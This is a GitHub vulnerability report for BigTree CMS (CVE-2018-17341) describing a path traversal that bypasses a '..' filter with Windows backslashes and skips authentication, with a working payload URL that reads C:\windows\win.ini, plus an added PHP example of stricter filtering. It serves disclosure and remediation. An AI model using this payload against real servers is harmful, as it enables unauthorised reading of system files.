Arbitrary file read #345

Closed
pupiles opened this issue Sep 22, 2018 · 2 comments

pupiles commented Sep 22, 2018

When we use "Advanced" or "Simple Rewrite" routing,
in launch.php lines 28-42:

        if (!isset($_GET["bigtree_htaccess_url"])) {
            $_GET["bigtree_htaccess_url"] = "";
        }

        $bigtree["path"] = explode("/",rtrim($_GET["bigtree_htaccess_url"],"/"));
        $bigtree["trailing_slash_present"] = (substr($_GET["bigtree_htaccess_url"],-1,1) === "/");
    }

    // Prevent path manipulations
    $bigtree["path"] = array_filter($bigtree["path"],function($val) {
        if ($val == "..") {
            die();
        }
        return true;
    });

Although .. has been banned, we can use ..\..\..\..\ to bypass it on Windows,
and then we can control the path in core\admin\router.php line 26:

    $image_file = EXTENSION_ROOT."images/$image_path";

And we do not need to be authenticated;
in launch.php line 55:

    if (count($bigtree["path"]) < count($parts_of_admin)) {
        $in_admin = false;
    }

If count($bigtree["path"]) >= count($parts_of_admin), we can bypass authentication.

payload:

    http://127.0.0.1/BigTree-CMS/core/launch.php?bigtree_htacess_url=admin/images/..\..\..\..\..\..\..\..\..\..\C:\windows\win.ini
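
The check quoted in this report compares each "/"-separated segment with "..", so a value that uses "\" as its separator is seen as one segment and passes. As an added example (not part of the original issue, and not BigTree's code or its actual fix), the following PHP contrasts that check with a hypothetical stricter filter and a `realpath()` containment check; the function names `original_filter`, `strict_filter` and `resolve_inside` and the sample inputs are constructed for illustration.

```php
<?php
// Added illustration; not BigTree's code and not the project's actual fix.

// Same logic as the launch.php check quoted in the issue: split on "/" only,
// reject a request when a whole segment equals "..".
function original_filter(string $url): bool {
    foreach (explode("/", rtrim($url, "/")) as $val) {
        if ($val == "..") {
            return false;
        }
    }
    return true;
}

// Hypothetical stricter filter: treat "\" as a separator as well, so that
// "..\..\" is broken into segments before the ".." comparison.
function strict_filter(string $url): bool {
    if (strpos($url, "\0") !== false) {
        return false;
    }
    foreach (preg_split('#[/\\\\]+#', trim($url, "/\\")) as $segment) {
        if ($segment === "..") {
            return false;
        }
    }
    return true;
}

// Hypothetical containment check for the file lookup itself: resolve the
// final path and require it to remain under the intended base directory.
function resolve_inside(string $base, string $relative): ?string {
    $root = realpath($base);
    $full = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($root === false || $full === false) {
        return null;
    }
    $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($full, $root, strlen($root)) === 0 ? $full : null;
}

// Constructed sample requests (not taken from real traffic).
$samples = ["admin/images/logo.png", "admin/images/../x.ini", "admin/images/..\\..\\x.ini"];
foreach ($samples as $url) {
    printf("%-28s original=%s strict=%s\n", $url,
        original_filter($url) ? "pass" : "reject",
        strict_filter($url) ? "pass" : "reject");
}
var_dump(resolve_inside(sys_get_temp_dir(), ".."));
```

The containment check is the more robust of the two because it judges the resolved path rather than the spelling of the input, so it does not depend on enumerating every separator or encoding.
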
timbuckingham added a commit that referenced this issue Sep 27, 2018
@timbuckingham
Collaborator

Thanks! This should be fixed in all the current development branches for the next releases.

fgeek commented Dec 25, 2018

CVE-2018-17341 has been assigned for this vulnerability.
